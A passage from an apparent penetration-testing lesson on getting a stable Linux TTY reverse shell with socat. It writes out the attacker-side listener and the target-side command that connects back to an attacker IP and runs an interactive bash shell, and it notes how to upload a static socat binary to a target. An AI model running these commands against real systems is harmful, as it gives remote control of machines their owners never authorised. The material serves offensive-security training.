Now let's take a look at one of the more powerful uses for Socat: a fully stable Linux tty reverse shell. This will only work when the target is Linux, but is significantly more stable. As mentioned earlier, socat is an incredibly versatile tool; however, the following technique is perhaps one of its most useful applications. Here is the new listener syntax:

$ socat TCP-L:<port> FILE:`tty`,raw,echo=0

Let's break this command down into its two parts. As usual, we're connecting two points together. In this case those points are a listening port, and a file. Specifically, we are passing in the current TTY as a file and setting the echo to be zero. This is approximately equivalent to using the Ctrl + Z, stty raw -echo; fg trick with a netcat shell -- with the added bonus of being immediately stable and hooking into a full tty.

The first listener can be connected to with any payload; however, this special listener must be activated with a very specific socat command. This means that the target must have socat installed. Most machines do not have socat installed by default, however, it's possible to upload a precompiled socat binary(https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true), which can then be executed as normal.

The special command is as follows:

$ socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

This is a handful, so let's break it down.

The first part is easy -- we're linking up with the listener running on our own machine. The second part of the command creates an interactive bash session with  EXEC:"bash -li". We're also passing the arguments: pty, stderr, sigint, setsid and sane:

pty, allocates a pseudoterminal on the target -- part of the stabilisation process
stderr, makes sure that any error messages get shown in the shell (often a problem with non-interactive shells)
sigint, passes any Ctrl + C commands through into the sub-process, allowing us to kill commands inside the shell
setsid, creates the process in a new session
sane, stabilises the terminal, attempting to "normalise" it.
That's a lot to take in, so let's see it in action.

As normal, on the left we have a listener running on our local attacking machine, on the right we have a simulation of a compromised target, running with a non-interactive shell. Using the non-interactive netcat shell, we execute the special socat command, and receive a fully interactive bash shell on the socat listener to the left:

<Check img entitled socat stable shells>

Note that the socat shell is fully interactive, allowing us to use interactive commands such as SSH. This can then be further improved by setting the stty values as seen in the previous task, which will let us use text editors such as Vim or Nano.

If, at any point, a socat shell is not working correctly, it's well worth increasing the verbosity by adding -d -d into the command. This is very useful for experimental purposes, but is not usually necessary for general use.
